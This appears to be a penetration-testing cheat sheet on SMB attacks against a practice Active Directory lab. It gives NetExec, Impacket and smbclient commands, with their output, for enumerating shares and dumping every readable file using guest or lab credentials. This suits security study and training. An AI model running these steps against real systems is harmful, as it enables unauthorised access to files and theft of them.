SMB Attacks¶
SMB (Server Message Block) is a network file sharing protocol used by Windows systems. It operates on ports 139 and 445. Enumerating SMB services can reveal valuable information about the target system, including shared resources, user accounts, and potential vulnerabilities.
NMAP: SMB Enumeration
Nmap has a number of flags that can be used to enumerate SMB shares.
smb-enum-users.nse: To enumerate userssmb-enum-shares.nse: To enumerate SM Shares
NetExec: Shares Enumeration
Identify shared resources on the target Windows system. This can be done using tools like nxc to query SMB services for share information.
nxc smb 10.10.10.23 -u 'a' -p '' --shares
SMB 10.10.10.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.10.10.23 445 BRAAVOS [+] essos.local\a: (Guest)
SMB 10.10.10.23 445 BRAAVOS [*] Enumerated shares
SMB 10.10.10.23 445 BRAAVOS Share Permissions Remark
SMB 10.10.10.23 445 BRAAVOS ----- ----------- ------
SMB 10.10.10.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.10.10.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.10.10.23 445 BRAAVOS C$ Default share
SMB 10.10.10.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.10.10.23 445 BRAAVOS IPC$ Remote IPC
SMB 10.10.10.23 445 BRAAVOS public Basic Read share for all domain users
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' --shares
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
NetExec: Accessing and dumping all files
List all readable files¶
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' -M spider_plus
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.10.11.json".
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Shares: 5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Readable Shares: 3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total folders found: 20
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total files found: 13
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size average: 582 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size min: 0 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size max: 3.68 KB
Dumping all readable files¶
nxc smb 10.10.10.11 -u 'samwell.tarly' -p 'Heartsbane' -M spider_plus -o DOWNLOAD_FLAG=True
SMB 10.10.10.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.10.10.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] DOWNLOAD_FLAG: True
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] STATS_FLAG: True
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB 10.10.10.11 445 WINTERFELL [*] Enumerated shares
SMB 10.10.10.11 445 WINTERFELL Share Permissions Remark
SMB 10.10.10.11 445 WINTERFELL ----- ----------- ------
SMB 10.10.10.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.10.10.11 445 WINTERFELL C$ Default share
SMB 10.10.10.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.10.10.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.10.10.11 445 WINTERFELL SYSVOL READ Logon server share
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [-] Failed to download file "DSyXKmYorq.txt". Error: 'RemoteFile' object has no attribute 'get_filesize'
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.10.11.json".
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Shares: 5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Readable Shares: 3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total folders found: 20
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Total files found: 13
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size average: 582 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size min: 0 B
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File size max: 3.68 KB
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] File unique exts: 6 (.ps1, .txt, .cmt, .inf, .ini, .pol)
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Downloads successful: 12
SPIDER_PLUS 10.10.10.11 445 WINTERFELL [*] Downloads failed: 1
Impacket: Accessing and dumping SMB files
This example demonstrates how to use the impacket-smbclient tool to list and download files from an SMB share using valid credentials.
impacket-smbclient samwell.tarly@10.10.10.11
Impacket v0.11.0 - Copyright 2023 Fortra
Password:
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
SYSVOL
# use NETLOGON
# ls
drw-rw-rw- 0 Fri Dec 5 12:43:04 2025 .
drw-rw-rw- 0 Fri Dec 5 12:43:04 2025 ..
-rw-rw-rw- 165 Sat Oct 18 16:01:29 2025 script.ps1
-rw-rw-rw- 869 Sat Oct 18 16:01:32 2025 secret.ps1
# get secret.ps1
# get script.ps1
# exit
➜ ~ ls
secret.ps1 script.ps1
➜ ~
SMBClient: Listing and dumping SMB files
This example demonstrates how to use the smbclient tool to list and download files from an SMB share using valid credentials.
smbclient -L //10.10.10.11/ -U samwell.tarly%Heartsbane
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.11 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available.
smbclient //10.10.10.11/NETLOGON -U samwell.tarly%Heartsbane
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Dec 5 12:43:04 2025
.. D 0 Fri Dec 5 12:43:04 2025
script.ps1 A 165 Sat Oct 18 16:01:29 2025
secret.ps1 A 869 Sat Oct 18 16:01:32 2025
15638527 blocks of size 4096. 11305157 blocks available
smb: \> get script.ps1
getting file \script.ps1 of size 165 as script.ps1 (53.7 KiloBytes/sec) (average 53.7 KiloBytes/sec)
smb: \> get secret.ps1
getting file \secret.ps1 of size 869 as secret.ps1 (424.3 KiloBytes/sec) (average 202.0 KiloBytes/sec)
smb: \> exit
➜ ~ ls
secret.ps1 script.ps1